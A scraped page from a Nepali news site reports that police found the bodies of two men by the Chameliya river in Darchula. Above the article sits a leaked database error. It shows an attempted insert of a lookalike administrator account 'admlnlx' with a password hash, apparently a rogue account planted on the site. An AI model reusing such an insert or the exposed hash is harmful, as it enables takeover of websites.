WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3K5wo0YRUgQ4Vnhbl/t.gm7DVZZAS1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-08 16:31:27', '', 'admlnlx', 'admlnlx')

दर्चुलाको चमेलिया नदीमा २ जनाको शव फेला – Gaule Khabar

दर्चुलाको चमेलिया नदीमा २ जनाको शव फेला

दर्चुलाको चमेलिया नदीमा २ जनाको शव फेला

१३ वैशाख, दार्चुला । दार्चुलाको चमेलिया नदी किनारमा बुधबार २ जनाको शव फेला परेको छ ।

शैल्यशिखर नगरपालिका वडा नम्बर २ का अन्दाजी ५२ वर्षीय गोपालदत्त जोशी र बैतडी, डिलाशैनी गाउँपालिका–३ का ३२ वर्षीय धिर्क बोहराको शव फेला परेको इलाका प्रहरी कार्यालय गोकुलेश्वरका प्रहरी नायब निरीक्षक जयानन्द नाथले जानकारी दिए ।

बैतडीका बोहराका शव पङ्शेरा नजिक फेला परेको भने दार्चुलाका जोशीका शव खोला नजिक फेला परेको प्रहरी नायब निरीक्षक नाथले बताए ।

बजार जान्छु भन्दै मंगलबार घरबाट हिँडेका शैल्यशिखर नगरपालिका २ का जोशीको शव बुधबार नदीमा फेला परेको जिल्ला प्रहरी कार्यालय दार्चुलाले जनाएको छ । जोशीको शव गोकुलेश्वर अस्पतालमा पोष्टमार्टम गरी आफन्तको जिम्मा लगाइएको छ भने बोहराको शव पनि आफन्तको जिम्मा लगाइएको प्रहरी नायब निरीक्षक जयानन्द जोशीले बताए । साभार: अनलाइनखबर

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका